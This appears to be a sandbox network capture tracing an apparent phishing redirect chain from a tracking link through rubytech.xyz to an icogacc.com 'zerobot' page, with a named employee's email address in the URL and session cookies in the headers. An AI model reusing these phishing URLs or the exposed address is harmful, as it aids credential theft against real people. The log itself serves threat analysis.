2025-01-14 23:30:02 UTC	807	OUT	GET /ahoy/messages/IyOwn1xl2n6XdxToR2XV5dCRxhEvflsH/click?signature=96e743b76714148502315415a04739f234047e43&url=https://rubytech.xyz/0secure/index.html HTTP/1.1 Host: app.supercast.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 23:30:02 UTC	410	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 14 Jan 2025 23:30:02 GMT Content-Type: text/html Content-Length: 105 Connection: close Server: nginx Location: https://rubytech.xyz/0secure/index.html Cache-Control: no-cache X-Request-Id: e6528318-71b9-4caf-8566-35bcf766af40 X-Runtime: 0.044418 Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubDomains X-Powered-By: cloud66
2025-01-14 23:30:02 UTC	105	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 75 62 79 74 65 63 68 2e 78 79 7a 2f 30 73 65 63 75 72 65 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body>You are being <a href="https://rubytech.xyz/0secure/index.html">redirected</a>.</body></html>

Timestamp	Bytes transferred	Direction	Data
2025-01-14 23:30:03 UTC	673	OUT	GET /0secure/index.html HTTP/1.1 Host: rubytech.xyz Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 23:30:04 UTC	533	IN	HTTP/1.1 200 OK Connection: close cache-control: public, max-age=2592000 expires: Thu, 13 Feb 2025 23:30:03 GMT content-type: text/html last-modified: Mon, 13 Jan 2025 12:13:09 GMT accept-ranges: bytes content-length: 2130 date: Tue, 14 Jan 2025 23:30:03 GMT server: LiteSpeed x-content-type-options: nosniff x-xss-protection: 1; mode=block alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2025-01-14 23:30:04 UTC	835	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 20 53 63 72 65 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 2f 2f 20 52 65 74 72 69 65 76 65 20 74 68 65 20 66 72 61 67 6d 65 6e 74 20 70 61 72 74 20 6f 66 20 74 68 65 20 55 52 4c 20 77 69 74 68 6f 75 74 20 74 68 65 20 6c 65 61 64 69 6e 67 20 27 23 27 0a 20 20 20 20 6c 65 74 20 68 61 73 68 56 61 6c 75 65 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 6c 69 63 65 28 31 29 3b 0a 0a 20 20 20 20 2f 2f 20 52 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8" /> <title>Loading Screen</title> <script> (function() { // Retrieve the fragment part of the URL without the leading '#' let hashValue = window.location.hash.slice(1); // R
2025-01-14 23:30:04 UTC	1295	IN	Data Raw: 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2f 2a 20 43 6f 6e 74 61 69 6e 65 72 20 74 6f 20 68 6f 6c 64 20 74 68 65 20 6c 6f 61 64 65 72 20 61 6e 64 20 74 65 78 74 20 2a 2f 0a 20 20 20 20 2e 6c 6f 61 64 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2f 2a 20 4f 75 74 65 72 20 6c 6f 61 64 65 72 20 62 61 72 20 73 74 79 6c 69 6e 67 20 28 73 6d 61 6c 6c 65 72 20 64 69 6d 65 6e 73 69 6f 6e 73 29 20 2a 2f 0a 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 0a 20 20 20 20 20 20 77 69 Data Ascii: background: #f5f5f5; font-family: Arial, sans-serif; } /* Container to hold the loader and text / .loader-container { text-align: center; } / Outer loader bar styling (smaller dimensions) */ .loader { wi

Timestamp	Bytes transferred	Direction	Data
2025-01-14 23:30:05 UTC	737	OUT	GET /SITE-ID-kwtg6t7218698782/zerobot?email=ludmila.glinberg@mitel.com HTTP/1.1 Host: icogacc.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://rubytech.xyz/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 23:30:05 UTC	343	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 14 Jan 2025 23:30:05 GMT Server: nginx/1.25.5 Content-Type: text/html; charset=iso-8859-1 Content-Length: 294 Location: https://icogacc.com/SITE-ID-kwtg6t7218698782/zerobot/?email=ludmila.glinberg@mitel.com X-Server-Cache: true X-Proxy-Cache: MISS host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
2025-01-14 23:30:05 UTC	294	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 63 6f 67 61 63 63 2e 63 6f 6d 2f 53 49 54 45 2d 49 44 2d 6b 77 74 67 36 74 37 32 31 38 36 39 38 37 38 32 2f 7a 65 72 6f 62 6f 74 2f 3f 65 6d 61 69 6c 3d 6c 75 64 6d 69 6c 61 2e 67 6c 69 6e 62 65 72 67 40 6d Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://icogacc.com/SITE-ID-kwtg6t7218698782/zerobot/?email=ludmila.glinberg@m

Timestamp	Bytes transferred	Direction	Data
2025-01-14 23:30:05 UTC	738	OUT	GET /SITE-ID-kwtg6t7218698782/zerobot/?email=ludmila.glinberg@mitel.com HTTP/1.1 Host: icogacc.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://rubytech.xyz/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 23:30:08 UTC	429	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 23:30:08 GMT Server: nginx/1.25.5 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Server-Cache: true X-Proxy-Cache: MISS Set-Cookie: PHPSESSID=b7e09a0c1cc52061afa97e3d2c18fee7; path=/ Transfer-Encoding: chunked
2025-01-14 23:30:08 UTC	1249	IN	Data Raw: 34 64 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 Data Ascii: 4d5<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetic
2025-01-14 23:30:08 UTC	696	OUT	GET /favicon.ico HTTP/1.1 Host: icogacc.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://icogacc.com/SITE-ID-kwtg6t7218698782/zerobot/?email=ludmila.glinberg@mitel.com Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=b7e09a0c1cc52061afa97e3d2c18fee7
2025-01-14 23:30:09 UTC	8192	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 23:30:09 GMT Server: nginx/1.25.5 Content-Type: text/html; charset=UTF-8 Content-Length: 11428 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, no-cache, private Pragma: no-cache Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Strict-Transport-Security: max-age=31536000; includeSubdomains Vary: Accept-Encoding Content-Encoding: gzip host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Server-Cache: false Set-Cookie: XSRF-TOKEN=eyJpdiI6IkNzUm9zR283SHNLcktSRnlrcEtXQXc9PSIsInZhbHVlIjoiaXd5SHdXYlcxZkJHMUJDY3BUQ3FCNVlxdThReVJmNDB6WFNEVU1ISExxelJyZzAyeVdrVGFPZWg1aXNiQzV0cW5OLzQ4cUMrelJCRW5JdlUwQlBCLzQ2anBxZzJ2aDNXRm41d2M3c3NEQ1BWWmdRblpQdmlMUFhuaWRNcDZPa2giLCJtYWMiOiI3NDk5MmRkNDRiZmM3YmNiMDBiM2ViMzQ5ZDY5NzIyMzFkMzNmZjVlZjI0MDc4ZTQzZTE0ODQ3MTdlZTFkNmViIn0%3D; expires=Wed, 15-Jan-2025 01:30:09 GMT; Max-Age=7200; path=/; samesite=lax Set-Cookie: icog_anyonecancode_session=eyJpdiI6IkhoN3RhUjZnQ1hjOS9ua0dhVE05YVE9PSIsInZhbHVlIjoieWEySWZkaTFMeVBpRWZnRDZLWU5VSG1IMnliTkEvaVovbTZneWF6YVFPKzFZYkIxZTYyOTFhd3l3Ti9IOUN2aXVQTHM0Sm4zNnNSRE85aWJMR2I2eXFmYStLeDAzcnNoaStaNS9XZ1BKbTFNM0RPWDRxNk05VXkrTGw5dnZkS3AiLCJtYWMiOiIxN2U0MDI4NWMxMDQ1YjNhZDQ5OTdhN2Y5YmViY2JhNzY3YmQyYTE2YWEyMGI0MjZiNGQwM2RmMDVkNTY0OWVlIn0%3D; expires=Wed, 15-Jan-2025 01:30:09 GMT; Max-Age=7200; path=/; httponly; samesite=lax rv<37"u";'q99Y]t4)Z5IHYwFK$]^_$8Ae<@z_RT3y9tK mogZ2i<)iwVV&@X^Sjv6#9_{ #H\|Z,Y=I1-92m2aESF`jk@=.&G/S_lqpsx#QQE_i]&8S1eT4@nwQ<WoC~WX.X"PdL%aMeH9\|J{64J=JBN-2(h`7 K v;1E1>Bh!ZHGU2P&t(BS[C2`:[ge@^)KCSz0&dgjq$@4knr<T9Q4H&`ZBXJ$ ubu; -\|U6OQCtLEGu?<>fT;&OSo1}\|WcI#}'YaRF?LRG,:<gI{a0GLoU43z~<h="ng2rowU=:z>6o?2j73-M)<c?R+ow}oRqS2c{KWmxcw? X##<}UC`>82K@)kNlc!nnkHMFNpS^uag\:j,xXdY:0([u@mFM vTk fs^)o(~!dLJN@/AT!=~ ~Atpu-5l`]Z-n}L c.Vtj_#N,Eig%vpc;tIGfw6}X=$pkxN&W2&PR4M;]j 2&T"cTnCj!UZ6I5@Nl'{]Yidry~gLe4}vGDytT\|Ix8uUJ^.Zu0X?}z43yozxV9"vj6]L82EMb(kUQ3tMwWyY}k_$^ra6%D"GIMH#~B&@9%nPT{yc5yD(>OSZ8DHScPqSgWe`@/!l?Fv[sRhf^bmf;4Ljxu6T.sR%\|zF P+A4KimG!=iZr}fog$#7 K[H<ZHF!Tk7!#W[-K`+9RR%SHS.Cy~#Zy!BvP9PV'jmw~xL.'FBJ{/9W#PHlS,OQcxy<~pBrD&G$/Tr>&N=vz=2{<6ywIwf3/63gJ;g2n<`l#zpVgdnPScop;Na^oxqb1a&+@K]Y5&$tI69OhBXtcz8N<3FU[JYfksiA;_dV<_7HMVt).\^/\{ptrE~^qbu\|6\h3Un@]x'\|QLehiG<5KYNt#n/!>[z[ETGQcal q]^u-52e`]FXRglzw\|-9~2vKhYf9c `nKv$M`eeP2~Ud.DCBN[HT;E;sT#T\|IE;!Z^9kyLpp]s-iQD= ><Aeo.eaT-.G22%u_1K\y!Z~&ybo\DkEGfgB-)kj%5\+JrBh~q$K$AHX6M8=0"Qb`LS 5K@i&c"cq[E 4Y[e2H2$G3V\Bmc7< RZm`7aH^T\&R@vC8,h LcPldO2LzQ`xTlYr4,b!/_iS=sSaIU(VE^SDr5Mq\H-`0ju]l> SAJ$H-q$7kJY%ELIy[(c26/1KhmYcG\'.!]o%;25f58b)5rb~ny%ovJsc$4\8;qL.,l]mK":a\s`-(P(k,H3!FLSf9C%rGl!\5Ji47Kpl;4P-Sq>QjCFzts)o=& J3cC&{vWe>a`e\z2N[4[RK3pbf]04;:"OT ,:'UCz%b"3<phDs7wBUXBT&8[8Ar-au{=\)l^]kt){XC~E_M\@87o:!#xBlU'(K^_Mh>Q)@KD"apB&DJYt8(B!RSy';{t]OiO~OScy']@[K@v&M )JpsaUJTl?1(<9{Wx/yY,!v;W8%/BU='JxI)f`;118#>K]?\%OXW%qm>7Y%n>N)[R3Vi,wuy'"F3oQa`V$?\|X9gH{ t.sH-\PuVhX'u{Xc>K. mDB@@!SR.$r !Pcs8un,+]Hlf&$3Y)32[R=m:W`3YaUB1R]jNEYU,Vf?6Hy6=x.P~ZI{$.@/tVRmq(j0L+!rH%lJ>+zF}I9@'h 9681oU,VH($cin,IU8V%7y)e.DYp];vXr&O~BWT.Bw:?yo 5V9APjH$RpCA0T-!$V \6HZj(kUKXsh]ynsne5-wS;Tm)n.nonGVUsn1R vEY`WZt!+#9gXf\|c}^oK)CRdjEscyk>/C L_~O,oyKrr<jrwM&&6wWw\|k\uSW~_,64~9emAP@s%uqf\|=x-76yVbk>'G5Z=rP1VC[VFKDw8PeJj,kh3Rvl0nE)]wiv/T"%Wkj%5A\@.$pQt`FZ i;vF&;\|$!-Rb8vZ2&Ta:g WKc[C2T5I9)bibZv'j%hradR-P/smD$;b;d\SBQuRhfs/63Ze(h3;{gqgxow>Kcii/6A`+r]Aa_/dZ ^s&\|d;xJc/o%9vbUUKtf3+IE;1bg\zZDy2)zC-QJ6XaB3.xp.m"UJ^r>=kgx]abik4P=Q9'g=,CS8-nrsG~i7Y.1K3nJ,\{1`-I#tid[Lp-ZjB;<}NY18-gvT)8mZV /5EB?pC]kmZO\|YC%,F+}&yVf&2v;uDf+\12-/BIBU)S9\Y@]_rQ&{4_): ULKHXcp-6_E"SbM]G!.NZI TB&`FZ ^iPKD5_lpIC,%.OdX<N,YM^\\KX#fW&o4S+drl 9pZr-a3I<v#pcn +E&vPdE5EiB$`7k`ts)[8Y5m$H1>w3\4JM"+8@N%_Y,5_7rgnl 82aeJ5UkHV)nR%FnBgSa2DL]}Q.Jrqi])P$2&smMXL5vu"VsKScVC#!vr[#+WFIiZv,ap;7MBUQ#'[[R&jY.:XjMkrvXr4c`jK,4e3Q"wdMmnUSFsp3aHrL9>mG7cP!x936nnhwqZX+VZ^w,s!Z^;xJc/o%9;gmJc#.;(DMshyRY]<='Q ,2s8]ca&i~K9G\|'_Uu-Z<Aua$i8Qk6@pNMHQmjb58^YOE%s;'&
2025-01-14 23:30:09 UTC	1467	IN	Data Raw: 5a e5 71 82 52 b1 44 2a a1 e2 75 db db 18 c0 3b cd ce f8 85 8a d1 dd 84 46 e8 43 4e 2d 10 15 91 32 28 68 60 da 68 01 f4 bd e0 b0 74 6a 6e 20 88 49 54 2e 42 cc 10 1c 06 8c e1 81 00 e7 0c 8a fc 11 2d 24 68 42 a4 94 81 ca 30 81 9b 25 4c e7 8c 53 e1 8a 72 29 14 5b 38 ca dc 1a 92 21 15 69 31 d5 3e 9d 77 b2 b3 47 d7 75 eb f1 94 c6 f0 84 e1 f7 34 35 56 69 2c 9d 77 d2 35 0e 04 b8 b5 04 b4 7a 8b ac f1 2b 6e 67 32 de 74 88 a8 30 b0 91 a2 54 fa ea 0e 37 97 70 11 96 8d 6a cd 7f 51 25 ef ad f4 7f de 4c e5 cb f6 1e cb 4f de f8 33 1e 73 8b d2 2d c8 f3 37 9f d3 3c dc bc 87 da 1d 7f 85 07 ca f0 92 97 15 eb cf 12 62 b7 73 a5 4a 4d 90 8a 43 71 0f fc 69 8c 7e 51 02 3d f9 c2 a9 22 94 8c 5f 55 d1 73 f2 8a 5a ae e4 8a 87 98 94 52 2d cb 2b b9 50 69 06 96 bb f3 17 a3 6e 1c 83 43 Data Ascii: ZqRD*u;FCN-2(h`htjn IT.B-$hB0%LSr)[8!i1>wGu45Vi,w5z+ng2t0T7pjQ%LO3s-7<bsJMCqi~Q="_UsZR-+PinC
2025-01-14 23:30:09 UTC	3236	IN	Data Raw: 69 27 b1 a9 c0 df ba 68 63 42 f2 b6 7b 33 e8 f6 07 0d fc 1d 8d fb dd ee b8 85 a7 de 60 30 0c c7 cd 5b a6 a4 b1 ae a4 77 d4 ef 47 fd 59 7d 6a 34 4f 34 d8 5c 6f 5f cf b6 9e ae 03 3d ea 60 86 30 9c 4e bb cd db 6d 70 b6 3d f9 88 14 44 27 e8 04 87 d1 0f fa dd 09 cc b6 8d 2e b7 75 57 3b 9d aa aa 93 bb d6 87 38 9f dc ed 8e 56 b1 bd 9f 63 44 8f 8e ba c1 ec f2 c0 e4 81 b1 ce 13 02 64 6c 13 3c f8 49 ae 0d fe aa 0c 24 fe 68 85 8b c1 df e1 70 30 99 1c fd fc 5f d1 bb df 5c 78 7e 33 9e ce 6f 26 c3 fa d3 9d df 0c e8 fc a6 1f 55 9f f1 00 63 a3 2a 37 0e f1 83 e7 3e d4 77 97 77 bf 3d bc 1f 55 f5 23 bc 0f f1 3e c2 ba c1 a0 7a 3f 18 0d b0 0f 5a 85 2d f0 77 d4 eb 0d 07 c3 f1 0f a1 a0 3f 72 bc f7 26 d3 6e 6f 3c a0 bf bc f8 fd 8f ef f1 1e 29 fd 9c 32 c7 3f 51 c6 f9 fd 6d 20 a8 Data Ascii: i'hcB{3`0[wGY}j4O4\o_=`0Nmp=D'.uW;8VcDdl<I$hp0_\x~3o&Uc*7>ww=U#>z?Z-w?r&no<)2?Qm

Timestamp	Bytes transferred	Direction	Data
2025-01-14 23:30:10 UTC	1100	OUT	GET /favicon.ico HTTP/1.1 Host: icogacc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=b7e09a0c1cc52061afa97e3d2c18fee7; XSRF-TOKEN=eyJpdiI6IkNzUm9zR283SHNLcktSRnlrcEtXQXc9PSIsInZhbHVlIjoiaXd5SHdXYlcxZkJHMUJDY3BUQ3FCNVlxdThReVJmNDB6WFNEVU1ISExxelJyZzAyeVdrVGFPZWg1aXNiQzV0cW5OLzQ4cUMrelJCRW5JdlUwQlBCLzQ2anBxZzJ2aDNXRm41d2M3c3NEQ1BWWmdRblpQdmlMUFhuaWRNcDZPa2giLCJtYWMiOiI3NDk5MmRkNDRiZmM3YmNiMDBiM2ViMzQ5ZDY5NzIyMzFkMzNmZjVlZjI0MDc4ZTQzZTE0ODQ3MTdlZTFkNmViIn0%3D; icog_anyonecancode_session=eyJpdiI6IkhoN3RhUjZnQ1hjOS9ua0dhVE05YVE9PSIsInZhbHVlIjoieWEySWZkaTFMeVBpRWZnRDZLWU5VSG1IMnliTkEvaVovbTZneWF6YVFPKzFZYkIxZTYyOTFhd3l3Ti9IOUN2aXVQTHM0Sm4zNnNSRE85aWJMR2I2eXFmYStLeDAzcnNoaStaNS9XZ1BKbTFNM0RPWDRxNk05VXkrTGw5dnZkS3AiLCJtYWMiOiIxN2U0MDI4NWMxMDQ1YjNhZDQ5OTdhN2Y5YmViY2JhNzY3YmQyYTE2YWEyMGI0MjZiNGQwM2RmMDVkNTY0OWVlIn0%3D
2025-01-14 23:30:11 UTC	1448	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 23:30:11 GMT Server: nginx/1.25.5 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, no-cache, private Pragma: no-cache Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Strict-Transport-Security: max-age=31536000; includeSubdomains Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Server-Cache: false Set-Cookie: XSRF-TOKEN=eyJpdiI6IkFpZjAwaDVnS0tSNGVvSUV5dUd4T2c9PSIsInZhbHVlIjoiNDhoZFlQNzg5S2RlM1ZkUmhCYWc5NzJ4VUoxcy9rSkZmT0tneUt6N3dDU0hwSTIyRVV6MkZTN2ZJaTNrT1RpUTZneVl5Zm01YVNSMTlELzJ3SVF3OGFqdmZNVFBFeE4rbW56bmQzWjJGOHFHNndId3BlMUZRcnA4VUNFWnArSjIiLCJtYWMiOiJmZjVhZTU1ZTlhYzUwY2NkZGNiNDY4YmEzNDNhZjRhYzUzZTBmMTY1NDMyYzk2NjhhZjFlMmMzN2ZjYmEyOTZjIn0%3D; expires=Wed, 15-Jan-2025 01:30:11 GMT; Max-Age=7200; path=/; samesite=lax Set-Cookie: icog_anyonecancode_session=eyJpdiI6IkFvMnR6QTduVll2RkZlcmZTdXFKOHc9PSIsInZhbHVlIjoibkJOYlBYTFhON0cwZS9tSHV2ZmVMTTNQa2xFblBYR2V4clgxMkZxMHJqT2ZQV01FUkhSamFnZFh1Zm9Ua3FNc2hldE1vK3RwNUhWNm9sSmdmdllxaVFTZUJqdGRMVThKSktoSEoveXlwSk4rLzRoOGtWSXlOVTN3NFlDTURmTjAiLCJtYWMiOiJkMjE4YzYxMzRlYWRlN2NlNjQ0NjM3NzJiYmUyMTYzMThkZGFhODBjZjM4OTU2ZWVmMWRlNWZiMTQ3NjgwYzc3In0%3D; expires=Wed, 15-Jan-2025 01:30:11 GMT; Max-Age=7200; path=/; httponly; samesite=lax Transfer-Encoding: chunked
2025-01-14 23:30:11 UTC	6744	IN	Data Raw: 31 61 32 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 20 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 41 70 70 6c 69 63 61 74 69 6f 6e 22 0a 20 20 20 20 6e 67 2d 61 70 70 3d 22 61 70 70 22 20 6e 67 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3d 22 41 70 70 43 74 72 6c 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 Data Ascii: 1a29<!DOCTYPE html><html lang="en" itemscope itemtype="https://schema.org/WebApplication" ng-app="app" ng-controller="AppCtrl"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
2025-01-14 23:30:11 UTC	5	IN	Data Raw: 66 66 61 0d 0a Data Ascii: ffa
2025-01-14 23:30:11 UTC	8186	IN	Data Raw: 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 63 6f 67 61 63 63 2e 63 6f 6d 2f 6c 6f 67 6f 2d 70 6e 67 2e 70 6e 67 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 6d 74 2d 35 20 74 65 78 74 2d 64 61 72 6b 20 70 2d 30 20 6d 74 2d 30 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 22 3e 3c 73 74 72 6f 6e 67 3e 57 65 27 72 65 20 4f 66 66 6c 69 6e 65 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 